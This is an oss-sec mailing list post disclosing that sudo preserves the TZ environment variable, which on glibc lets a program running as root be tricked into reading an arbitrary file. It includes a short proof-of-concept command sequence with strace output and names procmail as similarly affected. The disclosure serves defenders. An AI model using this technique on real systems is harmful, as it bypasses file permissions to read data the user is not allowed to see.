oss-sec mailing list archives
Abusing TZ for fun (and little profit)
From: Jakub Wilk <jwilk () jwilk net>
Date: Thu, 16 Oct 2014 00:35:32 +0200
By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:
$ echo moo > tz $ chmod 0 tz $ cat tz cat: tz: Permission denied $ TZ=$PWD/tz sudo -u root strace -e read date read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512 read(3, "moo\n", 4096) = 4 read(3, "", 4096) = 0 Wed Oct 15 20:42:42 2014 +++ exited with 0 +++ Procmail is another program that recklessly whitelists TZ[2]. [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189 [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13 -- Jakub Wilk
Current thread:
- Abusing TZ for fun (and little profit) Jakub Wilk (Oct 15)
- Re: Abusing TZ for fun (and little profit) Dave Horsfall (Oct 15)
- Re: Abusing TZ for fun (and little profit) Dag-Erling Smørgrav (Oct 16)
- Re: Abusing TZ for fun (and little profit) Dan McDonald (Oct 15)
- Re: Abusing TZ for fun (and little profit) Jakub Wilk (Dec 14)
- Re: Abusing TZ for fun (and little profit) Dave Horsfall (Oct 15)